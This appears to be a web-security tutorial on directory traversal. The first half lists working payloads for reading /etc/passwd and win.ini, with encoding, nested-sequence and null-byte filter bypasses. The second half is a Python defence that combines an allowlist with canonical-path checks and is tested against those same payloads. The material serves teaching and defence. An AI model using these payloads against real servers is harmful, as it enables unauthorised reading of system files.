
<img src="/loadImage?filename=218.png">

/var/www/images/218.png

https://insecure-website.com/loadImage?filename=../../../etc/passwd

/var/www/images/../../../etc/passwd

https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini

You might be able to use an absolute path from the filesystem root, such as filename=/etc/passwd, to directly reference a file without using any traversal sequences.

You might be able to use nested traversal sequences, such as ....// or ....\/. These revert to simple traversal sequences when the inner sequence is stripped.

Web servers or applications may strip directory traversal sequences from your input before passing it to the filesystem API.

You can sometimes bypass this kind of sanitization by URL encoding, or even double URL encoding, the ../ characters. This results in %2e%2e%2f and %252e%252e%252f respectively. Various non-standard encodings, such as ..%c0%af or ..%ef%bc%8f, may also work.

Where the application requires the filename to end with a particular extension, it might be possible to use a null byte to effectively terminate the file path before the required extension, for example filename=../../../etc/passwd%00.png

Remediation

If you can't avoid passing user-supplied input to filesystem APIs, we recommend using two layers of defense to prevent attacks:
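The following is an added example, not code from the original notes: a Python implementation of a two-layer check for the loadImage-style handler above. The root directory /var/www/images is taken from the page's own example path; the allowlist of image extensions and the function names are assumptions. Layer 1 validates the raw filename against an allowlist and never tries to strip sequences (so encoded, double-encoded, nested and NUL-terminated payloads all fail the same check); layer 2 canonicalizes the joined path and confirms it is still under the root, which independently catches absolute paths and plain ../ traversal.

```python
import os
import re

# Assumed base directory (the page's example maps 218.png to /var/www/images/218.png).
IMAGE_ROOT = "/var/www/images"

# Layer 1 allowlist: a plain base name plus an image extension. No separators,
# no '%' (so single- and double-encoded sequences fail), no NUL, no extra dots.
# The extension set is an assumption for this example.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+\.(?:png|jpg|jpeg|gif)")


class UnsafeFilename(ValueError):
    """Raised when a user-supplied filename fails either layer of validation."""


def validate_filename(filename: str) -> str:
    """Layer 1: accept only names that match the allowlist, and return them unchanged.

    Validate the value the web framework hands over (after its single URL-decode)
    and reject on any mismatch rather than stripping or repairing '../': stripping
    is exactly what nested sequences such as ....// are built to survive.
    """
    if not _SAFE_NAME.fullmatch(filename):
        raise UnsafeFilename(f"filename rejected by allowlist: {filename!r}")
    return filename


def resolve_under_root(filename: str, root: str = IMAGE_ROOT) -> str:
    """Layer 2: canonicalize the joined path and confirm it stays under root.

    os.path.join discards root when filename is absolute, and realpath collapses
    '..' components and symlinks, so the containment check afterwards is the
    actual boundary. NUL is rejected first because the OS would truncate at it.
    """
    if "\x00" in filename:
        raise UnsafeFilename("NUL byte in filename")
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, filename))
    if candidate != root and not candidate.startswith(root + os.sep):
        raise UnsafeFilename(f"resolved path escapes root: {candidate!r}")
    return candidate


def safe_image_path(filename: str, root: str = IMAGE_ROOT) -> str:
    """Both layers in order; returns the filesystem path the handler may open."""
    return resolve_under_root(validate_filename(filename), root)


def check_layers(filename: str, root: str = IMAGE_ROOT) -> tuple:
    """Run each layer separately and report (layer1_ok, layer2_ok)."""
    results = []
    for check in (validate_filename, lambda f: resolve_under_root(f, root)):
        try:
            check(filename)
            results.append(True)
        except UnsafeFilename:
            results.append(False)
    return tuple(results)


if __name__ == "__main__":
    # Constructed sample inputs: the legitimate name from the page and the
    # payload shapes the page describes.
    samples = [
        "218.png",
        "../../../etc/passwd",
        "/etc/passwd",
        "....//....//....//etc/passwd",
        "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
        "%252e%252e%252fetc/passwd",
        "..%c0%af..%c0%afetc/passwd",
        "../../../etc/passwd\x00.png",
        r"..\..\..\windows\win.ini",
    ]
    for name in samples:
        layer1, layer2 = check_layers(name)
        print(f"{name!r:45} allowlist={layer1!s:5} containment={layer2!s:5}")
```

On a Linux server the backslash payload and the nested-sequence payload pass the containment check, because there they are just odd file names under the root; only the allowlist rejects them. That is the reason for keeping both layers rather than relying on canonicalization alone.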